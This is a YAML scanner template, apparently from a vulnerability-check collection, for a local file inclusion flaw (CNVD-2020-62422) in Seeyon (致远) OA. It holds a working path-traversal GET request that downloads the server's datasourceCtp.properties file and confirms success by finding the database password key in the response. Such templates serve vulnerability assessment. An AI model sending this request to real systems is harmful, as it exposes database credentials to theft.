product: 致远OA
vName: Seeyon - Local File Inclusion
type: 文件读取
vID:
  - CNVD-2020-62422
level: 2
vDesc: Seeyon is vulnerable to local file inclusion.
version: ''
note: ''
search: { }
protocol: http
link: https://blog.csdn.net/m0_46257936/article/details/113150699
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
    verify:
      logic: and
      check:
        - status: 200
        - header:
            value:
              - application/x-msdownload
            logic: and
        - body:
            value:
              - ctpDataSource.password
            logic: and
